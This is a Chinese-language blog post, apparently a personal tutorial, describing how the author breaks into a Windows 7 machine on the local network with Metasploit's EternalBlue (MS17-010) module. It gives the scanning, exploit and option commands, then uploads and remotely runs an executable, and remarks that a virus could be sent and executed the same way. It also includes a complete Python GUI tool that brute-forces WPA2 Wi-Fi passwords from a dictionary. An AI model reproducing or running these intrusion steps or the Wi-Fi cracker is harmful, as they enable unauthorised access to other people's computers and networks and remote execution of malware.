当前位置: 首页 > article >正文

Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

  • 前言
  • 一、信息收集
  • 二、开始入侵
    • 1.启动msfconsole
    • 2.搜索漏洞
    • 3.文件上传
    • 其他
  • 总结


前言

提示:这里可以添加本文要记录的大概内容:

我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。


提示:以下是本篇文章正文内容,下面案例可供参考

一、信息收集

第一步,信息收集
在这里插入图片描述
先查找自己的IP地址以方便查找同局域网的设备
在这里插入图片描述
然后使用nmap -O以一个一个扫
看我找到了什么
在这里插入图片描述
找到了,正好开放445端口
在这里插入图片描述

二、开始入侵

1.启动msfconsole

msfconsole

在这里插入图片描述
启动成功了,搜索ms漏洞

2.搜索漏洞

search ms17_010

然后扔给我们这些东西,以前用过的知道该使用哪个
在这里插入图片描述
输入:

use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
看到这个样子就是成功了,然后我们执行下一步,查找要设置的参数,输入options
在这里插入图片描述
yes是必须要设置的,no可以弄也可以不弄,我懒得弄了,
在这里插入图片描述
IP一定要设为目标的IP地址,然后我们再options
在这里插入图片描述
已经都准备好了,可以进行入侵了,输入

run

在这里插入图片描述

[*] Started reverse TCP handler on 192.168.22.13:4444 

这串代码讲的是开始反向TCP监听,监听本机的IP和端口

192.168.22.196:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.22.196:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.22.196:445    - Scanned 1 of 1 hosts (100% complete)

这串代码讲的是主机存在漏洞
然后哇啦哇啦,一顿准备
在这里插入图片描述
出现win了,已经渗透成功了

3.文件上传

在这里插入图片描述
我送给它安装DEV-c++吧

upload /路径/xxx.exe

在这里插入图片描述
上传完了,但上传到哪里了呢?
输入pwd可以看到在system32文件下
让我们运行它
输入

execute -f xxx.exe

-f是运行指定文件
在这里插入图片描述
好吧,我的报错了,原因我改了文件,至少远程启动文件了,也可以发送病毒并执行

其他

from tkinter import *
from pywifi import const
import pywifi
import time

def wificonnect(str, wifiname):
    # 窗口无线对象
    wifi = pywifi.PyWiFi()
    # 抓取第一个无线网卡
    ifaces = wifi.interfaces()[0]
    # 断开所有的wifi
    ifaces.disconnect()
    time.sleep(0)
    if ifaces.status() == const.IFACE_DISCONNECTED:
        # 创建wifi连接文件
        profile = pywifi.Profile()
        profile.ssid = wifiname
        # wifi的加密算法
        profile.akm.append(const.AKM_TYPE_WPA2PSK)
        # wifi的密码
        profile.key = str
        # 网卡的开发
        profile.auth = const.AUTH_ALG_OPEN
        # 加密单元,这里需要写点加密单元否则无法连接
        profile.cipher = const.CIPHER_TYPE_CCMP
        # 删除所有的wifi文件
        ifaces.remove_all_network_profiles()
        # 设置新的连接文件
        tep_profile = ifaces.add_network_profile(profile)
        # 连接
        ifaces.connect(tep_profile)
        time.sleep(1)
        if ifaces.status() == const.IFACE_CONNECTED:
            return True
        else:
            return False

def readPwd():
    # 获取wifi名称
    wifiname = entry.get().strip()
    path = r'./pwd.txt'
    file = open(path, 'r')
    while True:
        try:
            # 读取
            mystr = file.readline().strip()
            # 测试连接
            bool = wificonnect(mystr, wifiname)
            if bool:
                text.insert(END, '这个密码是正确的' + mystr)
                text.see(END)
                text.update()
                file.close()
                break
            else:
                text.insert(END, '这个密码是错误的' + mystr)
                text.see(END)
                text.update()
        except:
            continue

# 创建窗口
root = Tk()
root.title('wifi万能爆破器')
root.geometry('900x600')
# 标签
label = Label(root, text='输入要爆破的WIFI:')
# 定位
label.grid()
# 输入控件
entry = Entry(root, font=('微软雅黑', 20))
entry.grid(row=0, column=1)
# 列表控件
text = Listbox(root, font=('微软雅黑', 20), width=40, height=10)
text.grid(row=1, columnspan=15)
# 按钮
button = Button(root, text='开始爆破', width=20, height=2, command=readPwd)
button.grid(row=2, columnspan=2)
# 显示窗口
root.mainloop()

既然要联网肯定要联网,废话文学 这是我和chat gpt连夜写的,单纯只是密码爆破,嘿嘿
字典自己准备,网上一大堆,一搜一大把


总结

本文就是讲解远程控制并执行文件


http://www.kler.cn/a/16763.html

相关文章:

  • 从0开始学习Linux——文件管理
  • C获取程序名称的方法
  • 蔚来Java面试题及参考答案
  • 使用elementUI实现表格行拖拽改变顺序,无需引入外部库
  • HTML之表单学习记录
  • three.js 杂记
  • 【学习心得】Python多版本控制
  • 常用半导体器件
  • 数字孪生可视化平台开发 打通现实与虚拟世界
  • springboot第12集:DAO功能代码
  • vue基本语法
  • 通关MyBatis(上)
  • 二本做程序员有出路吗
  • python异常及其捕获
  • BM50-两数之和
  • ovs-vsctl 命令详解
  • js判断是否为null,undefined,NaN,空串或者空对象
  • 第一章--第一篇--了解 ChatGPT
  • 框架学习之KOCA框架简介
  • 【python基础语法八】正则表达式
  • MIT教授Tegmark:GPT-4敲响警钟,百年后人类何去何从丨智源大会嘉宾风采
  • 数据帧去掉VlanTag的代码(802.1Q)
  • go 语言环境安装(Windows 系统下安装)
  • ( 数组和矩阵) 566. 重塑矩阵 ——【Leetcode每日一题】
  • osg::Drawable类通过setDrawCallback函数设置回调函数的说明
  • 构建ChatGPT 镜像,并将其部署到 Docker 容器中。